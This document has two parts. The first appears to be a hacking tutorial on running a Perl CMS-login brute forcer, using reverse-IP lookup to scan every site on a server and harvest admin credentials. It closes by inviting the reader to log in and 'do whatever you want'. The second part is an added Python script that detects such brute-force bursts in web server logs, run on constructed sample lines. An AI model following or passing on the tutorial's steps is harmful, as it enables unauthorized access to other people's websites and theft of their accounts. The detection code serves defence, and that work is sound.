You'll need the Perl brute forcer made by B47CHGURU (credits to him).

Download Here====>

Extract all the files to "C:\" (or anywhere).

Now open CMD (Command Prompt).

Go to the path where you extracted the zip file, e.g. "C:\Invectus".

Type in the command " perl "

Now it will ask you:

Do you want to do reverseip or load website list from file..?(y/n)>

You can load a website list such as list.txt, or enter an IP address and it will find and scan every site hosted on that server (a reverse IP lookup). I prefer the reverseip option because it scans everything on the server.

For a website list enter "n"
For reverseip enter "y"

So let's say we enter "y":

IP/Website you want to reverse..? >

Now just enter the IP or website URL you want to reverse.

It will start scanning; as soon as it finishes it shows the results in an HTML file (invectus.html).

A hit comes up as the login URL (e.g. /wp-login.php, it depends on the CMS) followed by the credentials it found, e.g. admin 123456

And now you can log in and do whatever you want.

Hope you enjoyed reading this tutorial!
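A tool like the one above leaves a very recognisable trail in the target's web server log: a burst of POSTs to /wp-login.php (or Joomla's /administrator/index.php) from one address, and, if a guess lands, a redirect instead of the login form again. The following is an added example, not code from the original post, that runs that detection over Apache/nginx "combined" log lines. The log lines are constructed for the example (RFC 5737 addresses), the threshold and window are assumptions, and the status-code rule (WordPress answers a failed login with 200 and a successful one with a 302 to wp-admin; Joomla redirects with 303) is what the detector keys on.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Login endpoints of the two CMSes the tool targets; a POST here is a login attempt.
LOGIN_PATHS = ("/wp-login.php", "/administrator/index.php", "/xmlrpc.php")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def parse_line(line):
    """One combined-format line -> dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop ?action=... query strings
    return rec


def login_attempts(lines):
    """Yield (ip, timestamp, status) for every POST to a login endpoint."""
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            yield rec["ip"], rec["ts"], rec["status"]


def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Flag an IP that makes `threshold` login POSTs within `window` (assumed limits).
    A redirect (302 WordPress, 303 Joomla) after the burst began means a guess landed."""
    per_ip = defaultdict(list)
    for ip, ts, status in login_attempts(lines):
        per_ip[ip].append((ts, status))
    findings = {}
    for ip, events in per_ip.items():
        events.sort()
        for i in range(len(events)):
            j = i + threshold - 1
            if j < len(events) and events[j][0] - events[i][0] <= window:
                success = any(s in (302, 303) for _, s in events[i:])
                findings[ip] = {"attempts": len(events), "success": success}
                break
    return findings


# Constructed sample log (RFC 5737 documentation addresses), not a real capture:
# a normal login, a 12-guess burst from a Perl client that then succeeds, one Joomla login.
SAMPLE_LOG = [
    '198.51.100.9 - - [16/Aug/2014:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [16/Aug/2014:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.77 - - [16/Aug/2014:10:01:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4000 "-" "Perl"'
    for s in range(0, 24, 2)                     # 12 failures, two seconds apart
] + [
    '203.0.113.77 - - [16/Aug/2014:10:01:26 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Perl"',
    '192.0.2.33 - - [16/Aug/2014:10:02:00 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs, password found: {info['success']}")
```

The same counters are what a lockout plugin or fail2ban jail acts on; a slow attacker spreads guesses over many addresses and below the window, so the per-user failure count is worth tracking alongside the per-IP one.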